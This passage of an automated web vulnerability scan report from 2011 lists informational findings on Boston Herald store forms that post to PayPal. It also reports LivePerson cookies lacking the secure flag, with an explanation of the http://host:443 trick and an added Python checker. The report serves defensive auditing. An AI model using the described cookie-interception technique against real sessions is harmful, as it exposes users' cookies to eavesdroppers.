<img src="http://bh.heraldinteractive.com/images/siteImages/universal/soxBackCopies3.gif">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

15.11. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan212009.gif" width="104" height="105">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

15.12. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br />
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

15.13. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsSS.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

15.14. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune20.gif" width="104" height="171">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

15.15. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune19.gif">


<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

15.16. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://multimedia.heraldinteractive.com/images/galleries/front_11052008.jpg" width="104" height="112">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

15.17. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune6.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

15.18. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan202009.gif" width="104" height="106">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_s-xclick" type="hidden">
...[SNIP]...

15.19. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct302007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

15.20. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan222009.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

16. SSL cookie without secure flag set
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
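The check below is an added example for this section, not scanner output or LivePerson code. It parses the Set-Cookie headers captured in issue 16.1, lists the cookies issued without Secure, and then models the http://host:443/ trick from the issue background: cookie scope is domain and path only, so a plain-HTTP URL on port 443 still matches every cookie the HTTPS response set, and only Secure cookies are held back. The scope rules are a simplified RFC 6265 model (host-only cookie when Domain is absent, no public-suffix handling) and are an assumption of this example.

```python
"""Audit Set-Cookie headers for the Secure attribute and show which cookies a
browser would attach to a plain-HTTP request inside each cookie's scope.

Added example for this report section; it is not scanner output. The sample
headers are the Set-Cookie lines from the 16.1 response. Scope matching is a
simplified RFC 6265 model (host-only cookie when Domain is absent, no
public-suffix check); it is an assumption of this example, not browser code.
"""
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample: Set-Cookie header values copied from the 16.1 response.
SAMPLE_SET_COOKIE = [
    "LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; "
    "expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net",
    "HumanClickKEY=1417917221691646769; path=/hc/5296924",
    "HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924",
    "HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure",
]


class Cookie:
    def __init__(self, name: str, value: str) -> None:
        self.name = name
        self.value = value
        self.domain: Optional[str] = None  # None: host-only cookie
        self.path = "/"
        self.secure = False
        self.httponly = False


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value; attribute names are case-insensitive."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name.strip(), value.strip())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
        elif key == "domain" and val:
            cookie.domain = val.lstrip(".").lower()
        elif key == "path" and val.startswith("/"):
            cookie.path = val
    return cookie


def insecure_cookies(headers: List[str]) -> List[str]:
    """Names of cookies issued without the Secure attribute (the scanner's finding)."""
    return [c.name for c in map(parse_set_cookie, headers) if not c.secure]


def domain_matches(request_host: str, cookie: Cookie, origin_host: str) -> bool:
    if cookie.domain is None:
        return request_host == origin_host
    return request_host == cookie.domain or request_host.endswith("." + cookie.domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


def cookies_sent_to(url: str, headers: List[str], origin_host: str) -> List[str]:
    """Names of cookies a browser would attach to a request for url.

    Cookie scope ignores the port, so http://host:443/path is a plain-HTTP
    request that still matches every cookie set by https://host/path; only
    cookies carrying Secure are held back.
    """
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    sent = []
    for c in map(parse_set_cookie, headers):
        if c.secure and u.scheme != "https":
            continue
        if domain_matches(host, c, origin_host) and path_matches(u.path or "/", c.path):
            sent.append(c.name)
    return sent


if __name__ == "__main__":
    print("missing Secure:", insecure_cookies(SAMPLE_SET_COOKIE))
    trick = "http://base.liveperson.net:443/hc/5296924/"
    print("sent in clear to", trick, "->",
          cookies_sent_to(trick, SAMPLE_SET_COOKIE, "base.liveperson.net"))
```

Running it against the 16.1 headers reports LivePersonID, HumanClickKEY and HumanClickSiteContainerID_5296924 as lacking Secure, and shows that all three would be sent in clear text to http://base.liveperson.net:443/hc/5296924/ while HumanClickCHATKEY, the only cookie with Secure, is withheld.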


16.1. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the secure flag set: LivePersonID, HumanClickKEY and HumanClickSiteContainerID_5296924 (see the Set-Cookie headers in the response below; only HumanClickCHATKEY carries the secure attribute). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that the HumanClickKEY value issued here (1417917221691646769) reappears as the first half of the sessionkey parameter in the Location header of the same response, so it may form part of the chat session identifier and should not be dismissed without review.

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
